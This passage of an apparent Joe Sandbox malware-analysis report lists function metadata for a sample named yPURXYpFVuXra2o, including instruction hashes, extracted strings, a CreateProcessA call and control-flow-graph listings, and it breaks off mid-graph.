                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $ $%$&$&$7$7$X,q$Y$a$g$g$k$k$k$k$$wq
                                                                                                                                                                                                        • API String ID: 0-2275180334
                                                                                                                                                                                                        • Opcode ID: ce2b0c82cc7bc185a01ff7b914b43ef530741cc2a79e5e09da4080718bbd2f60
                                                                                                                                                                                                        • Instruction ID: e3e1004393fe2ff3253450b21ae47a3feb7a7b45dee6a963e1393393ac4d7c3b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce2b0c82cc7bc185a01ff7b914b43ef530741cc2a79e5e09da4080718bbd2f60
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8A21A34600706CFC715EF74C854BAAB7B2BFD9700F618AADD45A6B3A0DB71A985CB40
                                                                                                                                                                                                        Function 015C86D8 Relevance: .5, Instructions: 522COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2f96ece361537cad916652415d0b553b3edff3178aa9c46cf04866cf37e392a4
                                                                                                                                                                                                        • Instruction ID: d223fabef46c77d25e8fce258dc36dac28af2995692a0529efa2933f93b40f90
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f96ece361537cad916652415d0b553b3edff3178aa9c46cf04866cf37e392a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F22BC71A08254CFCB218FA8C4507BEBBF1BF49714F1889AED5659F692C335C842CB62
                                                                                                                                                                                                        Function 015C5F21 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 5ee904f91f5f9fb1ac1a77066bd85534f2b92a2a3fb2c8f19e413e46a6b0b227
                                                                                                                                                                                                        • Instruction ID: d44b5ec720603501ba86c515a422ef7d923a873868253328590b3666252b88bf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ee904f91f5f9fb1ac1a77066bd85534f2b92a2a3fb2c8f19e413e46a6b0b227
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C71FD71A04205CFC7548FE9C9802BAB7F0FB85721F04866BD425EF392E374DA458B62
                                                                                                                                                                                                        Function 015CD3B0 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: bffafb6da7d3a0e0d23b05f877712b47dea091d8d46a6bb71cc447ad293e6fd6
                                                                                                                                                                                                        • Instruction ID: ec453bb5262ec2bbf73a86f1d842eea2f625aa7173254d0d378366f6c818bedf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bffafb6da7d3a0e0d23b05f877712b47dea091d8d46a6bb71cc447ad293e6fd6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79311AB5D046188FEB18CFAB990069EBBF7BFC9200F14C4BAD549AB265DB340546CF51
                                                                                                                                                                                                        Function 015C99C0 Relevance: 6.4, Strings: 5, Instructions: 172COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 572 15c99c0-15c99f2 573 15c9a2e-15c9a6d 572->573 576 15c99f4-15c99f7 573->576 577 15c99f9 576->577 578 15c9a00-15c9a17 576->578 577->573 577->578 579 15c9b3e-15c9b49 577->579 580 15c9a6f-15c9a90 call 15c6504 577->580 581 15c9b99-15c9ba7 577->581 582 15c9be4-15c9bf8 577->582 583 15c9a95-15c9a9e 577->583 584 15c9ab5-15c9ad5 577->584 585 15c9bc5-15c9bc7 577->585 586 15c9b81-15c9b8b 577->586 587 15c9b33-15c9b39 577->587 590 15c9bfb-15c9c07 578->590 599 15c9a1d-15c9a2c 578->599 592 15c9b4b-15c9b52 579->592 593 15c9b66-15c9b6d 579->593 580->576 596 15c9ba9 581->596 597 15c9bb3-15c9bba 581->597 583->590 591 15c9aa4-15c9ab0 583->591 610 15c9ad7-15c9add 584->610 611 15c9af3 584->611 588 15c9bc9-15c9bcf 585->588 589 15c9be1 585->589 586->590 595 15c9b8d-15c9b94 586->595 587->576 604 15c9bd1 588->604 605 15c9bd3-15c9bdf 588->605 589->582 591->576 592->590 598 15c9b58-15c9b5c 592->598 593->590 600 15c9b73-15c9b7f 593->600 595->576 601 15c9bae 596->601 597->590 603 15c9bbc-15c9bc3 597->603 609 15c9b61 598->609 599->576 600->609 601->576 603->601 604->589 605->589 609->576 616 15c9adf-15c9ae1 610->616 617 15c9ae3-15c9aef 610->617 613 15c9af5-15c9b15 611->613 619 15c9b1d-15c9b24 613->619 618 15c9af1 616->618 617->618 618->613 619->590 621 15c9b2a-15c9b2e 619->621 621->576
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4qXq$4qXq$4qXq$4qXq$4qXq
                                                                                                                                                                                                        • API String ID: 0-3569446578
                                                                                                                                                                                                        • Opcode ID: d454b7bac8463b84500975a7901fddcee8ab9d47a89d6f4f79c3d1380d97eef6
                                                                                                                                                                                                        • Instruction ID: 98e864017ca816bbcb1afa1aa6c84924dab7cf16607060e350e25c20951c670c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d454b7bac8463b84500975a7901fddcee8ab9d47a89d6f4f79c3d1380d97eef6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4519F38E08255DFCB058FADC884ABDBBF2BF44B08F5485AAE456AF291C774C941CB51
                                                                                                                                                                                                        Function 015C99B0 Relevance: 3.9, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 622 15c99b0-15c99f2 623 15c9a2e-15c9a3a 622->623 624 15c99f4-15c99f7 622->624 636 15c9a45-15c9a6d 623->636 625 15c99f9 624->625 626 15c9a00-15c9a17 624->626 625->623 625->626 627 15c9b3e-15c9b49 625->627 628 15c9a6f-15c9a90 call 15c6504 625->628 629 15c9b99-15c9ba7 625->629 630 15c9be4-15c9bf8 625->630 631 15c9a95-15c9a9e 625->631 632 15c9ab5-15c9ad5 625->632 633 15c9bc5-15c9bc7 625->633 634 15c9b81-15c9b8b 625->634 635 15c9b33-15c9b39 625->635 639 15c9bfb-15c9c07 626->639 648 15c9a1d-15c9a2c 626->648 641 15c9b4b-15c9b52 627->641 642 15c9b66-15c9b6d 627->642 628->624 645 15c9ba9 629->645 646 15c9bb3-15c9bba 629->646 631->639 640 15c9aa4-15c9ab0 631->640 660 15c9ad7-15c9add 632->660 661 15c9af3 632->661 637 15c9bc9-15c9bcf 633->637 638 15c9be1 633->638 634->639 644 15c9b8d-15c9b94 634->644 635->624 636->624 654 15c9bd1 637->654 655 15c9bd3-15c9bdf 637->655 638->630 640->624 641->639 647 15c9b58-15c9b5c 641->647 642->639 649 15c9b73-15c9b7f 642->649 644->624 651 15c9bae 645->651 646->639 653 15c9bbc-15c9bc3 646->653 659 15c9b61 647->659 648->624 649->659 651->624 653->651 654->638 655->638 659->624 666 15c9adf-15c9ae1 660->666 667 15c9ae3-15c9aef 660->667 663 15c9af5-15c9b15 661->663 669 15c9b1d-15c9b24 663->669 668 15c9af1 666->668 667->668 668->663 669->639 671 15c9b2a-15c9b2e 669->671 671->624
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4qXq$4qXq$4qXq
                                                                                                                                                                                                        • API String ID: 0-3489013445
                                                                                                                                                                                                        • Opcode ID: ffc4d97336926969c3cfffa057acca3d644af23391e13c3bd20dc0ffe49bfee1
                                                                                                                                                                                                        • Instruction ID: 086cb85211db8acc885dc5b5cb290decd525c18b5dd7b0c12e895c1b7e0698a6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffc4d97336926969c3cfffa057acca3d644af23391e13c3bd20dc0ffe49bfee1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3551AC39E04256DFCB118FACC884ABDBBF2FF44B08F1485AAE555AB291C778C941CB51
                                                                                                                                                                                                        Function 06C64BB4 Relevance: 1.8, APIs: 1, Instructions: 328processCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 672 6c64bb4-6c64bb6 673 6c64bba 672->673 674 6c64bb8 672->674 675 6c64bbe-6c64c59 673->675 676 6c64bbc-6c64bbd 673->676 674->673 678 6c64ca2-6c64cca 675->678 679 6c64c5b-6c64c72 675->679 676->675 682 6c64d10-6c64d66 678->682 683 6c64ccc-6c64ce0 678->683 679->678 684 6c64c74-6c64c79 679->684 693 6c64dac-6c64ea3 CreateProcessA 682->693 694 6c64d68-6c64d7c 682->694 683->682 691 6c64ce2-6c64ce7 683->691 685 6c64c9c-6c64c9f 684->685 686 6c64c7b-6c64c85 684->686 685->678 688 6c64c87 686->688 689 6c64c89-6c64c98 686->689 688->689 689->689 692 6c64c9a 689->692 695 6c64d0a-6c64d0d 691->695 696 6c64ce9-6c64cf3 691->696 692->685 712 6c64ea5-6c64eab 693->712 713 6c64eac-6c64f91 693->713 694->693 701 6c64d7e-6c64d83 694->701 695->682 698 6c64cf7-6c64d06 696->698 699 6c64cf5 696->699 698->698 702 6c64d08 698->702 699->698 703 6c64da6-6c64da9 701->703 704 6c64d85-6c64d8f 701->704 702->695 703->693 706 6c64d93-6c64da2 704->706 707 6c64d91 704->707 706->706 708 6c64da4 706->708 707->706 708->703 712->713 725 6c64f93-6c64f97 713->725 726 6c64fa1-6c64fa5 713->726 725->726 727 6c64f99 725->727 728 6c64fa7-6c64fab 726->728 729 6c64fb5-6c64fb9 726->729 727->726 728->729 730 6c64fad 728->730 731 6c64fbb-6c64fbf 729->731 732 6c64fc9-6c64fcd 729->732 730->729 731->732 733 6c64fc1 731->733 734 6c65003-6c6500e 732->734 735 6c64fcf-6c64ff8 732->735 733->732 739 6c6500f 734->739 735->734 739->739
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C64E87
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                        • Opcode ID: 78eb4d0c2e51a31eeb90b0afd7d71c8f5005b5f9c0b8420ae694af206c9e2f81
                                                                                                                                                                                                        • Instruction ID: be7413f88af75608ba5fa9ec756df05dd18d5af1b25039f28ff19e6450ceab89
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78eb4d0c2e51a31eeb90b0afd7d71c8f5005b5f9c0b8420ae694af206c9e2f81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1C11571D002198FDB64DFA9C884BEEBBF1BF49300F1095A9E849B7240DB749A85CF95
                                                                                                                                                                                                        Function 06C64BC0 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 740 6c64bc0-6c64c59 742 6c64ca2-6c64cca 740->742 743 6c64c5b-6c64c72 740->743 746 6c64d10-6c64d66 742->746 747 6c64ccc-6c64ce0 742->747 743->742 748 6c64c74-6c64c79 743->748 757 6c64dac-6c64ea3 CreateProcessA 746->757 758 6c64d68-6c64d7c 746->758 747->746 755 6c64ce2-6c64ce7 747->755 749 6c64c9c-6c64c9f 748->749 750 6c64c7b-6c64c85 748->750 749->742 752 6c64c87 750->752 753 6c64c89-6c64c98 750->753 752->753 753->753 756 6c64c9a 753->756 759 6c64d0a-6c64d0d 755->759 760 6c64ce9-6c64cf3 755->760 756->749 776 6c64ea5-6c64eab 757->776 777 6c64eac-6c64f91 757->777 758->757 765 6c64d7e-6c64d83 758->765 759->746 762 6c64cf7-6c64d06 760->762 763 6c64cf5 760->763 762->762 766 6c64d08 762->766 763->762 767 6c64da6-6c64da9 765->767 768 6c64d85-6c64d8f 765->768 766->759 767->757 770 6c64d93-6c64da2 768->770 771 6c64d91 768->771 770->770 772 6c64da4 770->772 771->770 772->767 776->777 789 6c64f93-6c64f97 777->789 790 6c64fa1-6c64fa5 777->790 789->790 791 6c64f99 789->791 792 6c64fa7-6c64fab 790->792 793 6c64fb5-6c64fb9 790->793 791->790 792->793 794 6c64fad 792->794 795 6c64fbb-6c64fbf 793->795 796 6c64fc9-6c64fcd 793->796 794->793 795->796 797 6c64fc1 795->797 798 6c65003-6c6500e 796->798 799 6c64fcf-6c64ff8 796->799 797->796 803 6c6500f 798->803 799->798 803->803
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C64E87
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                        • Opcode ID: f5966b018d76c25ca03d4db2eed8e2302b98522d3859e3e84e44dbb4dd05f5b6
                                                                                                                                                                                                        • Instruction ID: 7c3a8baa924c724c64a9dc4076357fb36993a3ce3c71818701c7ade42864a109
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5966b018d76c25ca03d4db2eed8e2302b98522d3859e3e84e44dbb4dd05f5b6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89C12571D002198FDB64DFA9C884BEEBBF1BF49300F1095A9E809B7240DB749A85CF95
                                                                                                                                                                                                        Function 015C469D Relevance: 1.8, Strings: 1, Instructions: 547COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: \
                                                                                                                                                                                                        • API String ID: 0-417808876
                                                                                                                                                                                                        • Opcode ID: d1670563e6fea80c805e6d924441e2eda8e1ac2352faeac311eabd2b13e72d90
                                                                                                                                                                                                        • Instruction ID: 589ec7ce061fb6e71951a90f76b2a80c4456d789ae688d565720c4b53d357454
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1670563e6fea80c805e6d924441e2eda8e1ac2352faeac311eabd2b13e72d90
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64229D30A04258DFDB148FE8D874FAD77F2BB84B00F25846AE506AF299DB709C41CB95
                                                                                                                                                                                                        Function 015C31B0 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1016 15c31b0-15c3206 call 15c3b18 1171 15c3206 call 15c3d07 1016->1171 1172 15c3206 call 15c3c40 1016->1172 1173 15c3206 call 15c3c30 1016->1173 1018 15c320c-15c3276 call 15c2ac0 call 15c2824 call 15c2ad0 1030 15c327b-15c327e 1018->1030 1031 15c3287-15c328c 1030->1031 1032 15c3280 1030->1032 1031->1030 1032->1031 1033 15c355c 1032->1033 1034 15c33bf-15c3410 1032->1034 1035 15c3438-15c344b 1032->1035 1036 15c34fb-15c350a 1032->1036 1037 15c3555-15c355a 1032->1037 1038 15c3377-15c3381 1032->1038 1039 15c32d0-15c32da 1032->1039 1040 15c3493-15c34a0 1032->1040 1041 15c328e-15c32ce 1032->1041 1042 15c334e-15c3355 1032->1042 1043 15c34a8-15c34b2 1032->1043 1044 15c3525-15c3529 1032->1044 1045 15c3301-15c3307 1032->1045 1046 15c34c2 1032->1046 1047 15c3463-15c3472 1032->1047 1077 15c355f-15c3564 1033->1077 1174 15c3412 call 15c6098 1034->1174 1175 15c3412 call 15c6208 1034->1175 1176 15c3412 call 15c5f21 1034->1176 1052 15c3452 1035->1052 1088 15c350c 1036->1088 1089 15c3513-15c351a 1036->1089 1059 15c34ef-15c34f2 1037->1059 1060 15c33a1-15c33ab 1038->1060 1061 15c3383-15c338a 1038->1061 1050 15c32dc 1039->1050 1051 15c32e3-15c32ed 1039->1051 1040->1043 1041->1030 1057 15c344d 1042->1057 1058 15c335b-15c3366 1042->1058 1048 15c34b4-15c34c0 1043->1048 1049 15c34c5-15c34ea 1043->1049 1055 15c354c 1044->1055 1056 15c352b-15c3534 1044->1056 1053 15c330d-15c3319 1045->1053 1054 15c3309-15c330b 1045->1054 1046->1049 1093 15c348c-15c3491 1047->1093 1094 15c3474-15c347e 1047->1094 1062 15c3457-15c345a 1048->1062 1049->1059 1068 15c32e1 1050->1068 1051->1057 1069 15c32f3-15c32ff 1051->1069 1052->1062 1070 15c331b-15c3349 1053->1070 1054->1070 1074 15c354f 1055->1074 1071 15c353b-15c3548 1056->1071 1072 15c3536-15c3539 1056->1072 1057->1052 1058->1057 1075 15c336c-15c3372 1058->1075 1059->1036 1066 15c34f4 1059->1066 1060->1057 1063 15c33b1-15c33bd 1060->1063 1061->1057 1078 15c3390-15c3397 1061->1078 1062->1047 1090 15c345c 1062->1090 1079 15c339c 1063->1079 1066->1033 1066->1036 1066->1037 1066->1044 1081 15c357e-15c3582 1066->1081 1082 15c372f-15c3733 1066->1082 1083 15c3839-15c3840 1066->1083 1084 15c365b-15c36cb 1066->1084 1085 15c37f4-15c380b 1066->1085 1086 15c36e6-15c36eb 1066->1086 1087 15c36f0-15c370f 1066->1087 1068->1030 1069->1068 1070->1030 1092 15c354a 1071->1092 1072->1092 1074->1037 1075->1030 1103 15c3569-15c356c 1077->1103 1078->1079 1079->1030 1096 15c3584-15c358d 1081->1096 1097 15c35a5 1081->1097 1108 15c3735-15c373e 1082->1108 1109 15c3756 1082->1109 1156 15c36cd-15c36d3 1084->1156 1157 15c36e3 1084->1157 1134 15c380d-15c3813 1085->1134 1135 15c3823 1085->1135 1086->1103 1184 15c3714 call 15c99c0 1087->1184 1185 15c3714 call 15c99b0 1087->1185 1101 15c3511 1088->1101 1089->1077 1102 15c351c-15c3523 1089->1102 1090->1033 1090->1036 1090->1037 1090->1040 1090->1043 1090->1044 1090->1046 1090->1047 1090->1081 1090->1082 1090->1083 1090->1084 1090->1085 1090->1086 1090->1087 1092->1074 1107 15c348a 1093->1107 1094->1049 1106 15c3480-15c3487 1094->1106 1113 15c358f-15c3592 1096->1113 1114 15c3594-15c35a1 1096->1114 1116 15c35a8-15c362b 1097->1116 1101->1059 1102->1101 1103->1081 1111 15c356e 1103->1111 1106->1107 1107->1062 1119 15c3745-15c3752 1108->1119 1120 15c3740-15c3743 1108->1120 1112 15c3759-15c37be 1109->1112 1111->1081 1111->1082 1111->1083 1111->1084 1111->1085 1111->1086 1111->1087 1162 15c37c4-15c37dd 1112->1162 1121 15c35a3 1113->1121 1114->1121 1179 15c362e call 15c86d8 1116->1179 1180 15c362e call 15c86ca 1116->1180 1181 15c362e call 15c8830 1116->1181 1125 15c3754 1119->1125 1120->1125 1121->1116 1125->1112 1140 15c3815 1134->1140 1141 15c3817-15c3819 1134->1141 1177 15c3825 call 15cb4d8 1135->1177 1178 15c3825 call 15cb4b0 1135->1178 1139 15c371a 1182 15c371c call 15ca098 1139->1182 1183 15c371c call 15ca088 1139->1183 1140->1135 1141->1135 1142 15c382b 1149 15c3832-15c3834 1142->1149 1143 15c3418-15c3425 1143->1057 1146 15c3427-15c3433 1143->1146 1146->1030 1148 15c3722-15c372a 1148->1103 1149->1103 1158 15c36d5 1156->1158 1159 15c36d7-15c36d9 1156->1159 1157->1086 1158->1157 1159->1157 1162->1077 1169 15c37e3-15c37ef 1162->1169 1163 15c3634-15c3636 1164 15c364e-15c3656 1163->1164 1165 15c3638-15c363e 1163->1165 1164->1103 1167 15c3640 1165->1167 1168 15c3642-15c3644 1165->1168 1167->1164 1168->1164 1169->1103 1171->1018 1172->1018 1173->1018 1174->1143 1175->1143 1176->1143 1177->1142 1178->1142 1179->1163 1180->1163 1181->1163 1182->1148 1183->1148 1184->1139 1185->1139
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4qXq
                                                                                                                                                                                                        • API String ID: 0-1583228027
                                                                                                                                                                                                        • Opcode ID: 77ff24986aaef9af749321b998543b8cbc626e8a85ca72c418dd9d5c9c70ceec
                                                                                                                                                                                                        • Instruction ID: 81a093220b9a9ea069b6b1757531d044fbd8c8d94d4b35d313bbed6004c5bd4a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77ff24986aaef9af749321b998543b8cbc626e8a85ca72c418dd9d5c9c70ceec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F18334B403089FEB949FA8D4687BDB6F2BB89B10F14C469E506AF3D5DA708C41CB95
                                                                                                                                                                                                        Function 015C74C8 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1186 15c74c8-15c74f3 1187 15c74f8-15c74fb 1186->1187 1188 15c7501 1187->1188 1189 15c7652-15c7654 1187->1189 1188->1189 1190 15c7678-15c7691 1188->1190 1191 15c7718-15c771f 1188->1191 1192 15c75f9-15c75fd 1188->1192 1193 15c763a-15c763f 1188->1193 1194 15c76da-15c76eb 1188->1194 1195 15c759b-15c75af 1188->1195 1196 15c7535-15c753f 1188->1196 1197 15c7617-15c761b 1188->1197 1198 15c7551-15c7562 1188->1198 1199 15c76d2-15c76d9 1188->1199 1200 15c760d-15c7612 1188->1200 1201 15c752e-15c7533 1188->1201 1202 15c7508 1188->1202 1203 15c76ab-15c76c2 1188->1203 1204 15c7644-15c772e 1188->1204 1205 15c76c7-15c76cd 1188->1205 1206 15c76a1-15c76a6 1188->1206 1313 15c7659 call 15c74c8 1189->1313 1314 15c7659 call 15c74ba 1189->1314 1209 15c750b-15c750d 1190->1209 1225 15c7697-15c769c 1190->1225 1191->1196 1192->1194 1215 15c7603-15c7608 1192->1215 1193->1187 1210 15c76ed-15c76f3 1194->1210 1211 15c7733-15c7745 1194->1211 1195->1211 1214 15c75b5-15c75bb 1195->1214 1196->1211 1212 15c7545-15c754f 1196->1212 1197->1191 1216 15c7621-15c7628 1197->1216 1198->1211 1213 15c7568-15c756e 1198->1213 1200->1187 1201->1187 1202->1209 1203->1187 1204->1206 1205->1187 1206->1187 1208 15c765f-15c7666 1208->1211 1218 15c766c-15c7673 1208->1218 1221 15c750f-15c7516 1209->1221 1222 15c7527-15c752c 1209->1222 1210->1211 1224 15c76f5-15c7701 1210->1224 1233 15c7747-15c7749 1211->1233 1234 15c77a3-15c77a6 1211->1234 1212->1187 1213->1211 1217 15c7574-15c7580 1213->1217 1214->1211 1219 15c75c1-15c75cd 1214->1219 1215->1187 1216->1211 1223 15c762e-15c7635 1216->1223 1217->1211 1229 15c7586-15c7727 1217->1229 1218->1187 1219->1211 1231 15c75d3-15c75ea 1219->1231 1221->1211 1226 15c751c-15c7520 1221->1226 1227 15c7525 1222->1227 1223->1187 1224->1211 1228 15c7703-15c7713 1224->1228 1225->1187 1226->1227 1227->1187 1229->1203 1231->1211 1235 15c75f0-15c75f4 1231->1235 1236 15c77a7-15c77ae 1233->1236 1237 15c774b-15c7751 1233->1237 1234->1236 1235->1187 1238 15c77af-15c77b6 1236->1238 1237->1238 1239 15c7753-15c7759 1237->1239 1240 15c77b7-15c77b9 1238->1240 1239->1240 1241 15c775b-15c775d 1239->1241 1242 15c77bb-15c77bd 1240->1242 1241->1242 1243 15c775f-15c7761 1241->1243 1244 15c77bf-15c77c6 1242->1244 1243->1244 1245 15c7763-15c7769 1243->1245 1246 15c77c7-15c77cc 1244->1246 1245->1246 1247 15c776b-15c7771 1245->1247 1248 15c77cf-15c77d2 1246->1248 1247->1248 1249 15c7773-15c7779 1247->1249 1250 15c7a33-15c7a56 1248->1250 1251 15c777b-15c7781 1249->1251 1252 15c77d7 1249->1252 1254 15c77df 1251->1254 1255 15c7783-15c7785 1251->1255 1253 15c77dc 1252->1253 1253->1254 1259 15c77e8-15c77ed 1254->1259 1260 15c77e1 1254->1260 1256 15c7787-15c7791 1255->1256 1257 15c77e3-15c77e7 1255->1257 1261 15c77ef-15c77f0 1256->1261 1262 15c7793-15c779f 1256->1262 1257->1259 1259->1261 1260->1257 1260->1259 1263 15c7839-15c784c 1260->1263 1264 15c793a-15c794e 1260->1264 1265 15c785b-15c7860 1260->1265 1266 15c7910-15c7928 1260->1266 1267 15c78f0-15c7900 1260->1267 1268 15c79d1-15c79e6 1260->1268 1269 15c77f2-15c77f5 1260->1269 1270 15c7813-15c781a 1260->1270 1271 15c7953-15c795a 1260->1271 1272 15c780c-15c7811 1260->1272 1273 15c79ac-15c79b3 1260->1273 1274 15c796c-15c7973 1260->1274 1275 15c792d-15c7935 1260->1275 1276 15c786f-15c7873 1260->1276 1277 15c79eb-15c79fe 1260->1277 1278 15c79c4-15c79cc 1260->1278 1279 15c78a4-15c78ab 1260->1279 1280 15c7985-15c7989 1260->1280 1281 15c7865-15c786a 1260->1281 1282 15c7906-15c790b 1260->1282 1283 15c78c2-15c78db 1260->1283 1261->1253 1262->1234 1287 15c7a00 1263->1287 1295 15c7852-15c7859 1263->1295 1264->1253 1265->1253 1266->1253 1267->1282 1290 15c77f8-15c77fc 1267->1290 1268->1253 1269->1290 1305 